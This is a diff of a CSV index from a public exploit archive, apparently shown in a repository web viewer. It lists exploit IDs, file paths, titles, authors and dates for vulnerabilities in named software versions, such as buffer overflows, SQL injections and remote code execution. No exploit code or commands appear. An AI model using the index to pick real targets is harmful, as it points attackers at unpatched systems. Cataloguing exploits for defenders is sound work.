48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
|
||||
48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
|
||||
48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18167,6 +18173,7 @@ id,file,description,date,author,type,platform,port
|
|||
48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,
|
||||
48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows,
|
||||
48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux,
|
||||
48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -42793,3 +42800,6 @@ id,file,description,date,author,type,platform,port
|
|||
48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php,
|
||||
48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
|
||||
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
|
||||
48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
|
||||
48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
|
||||
48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue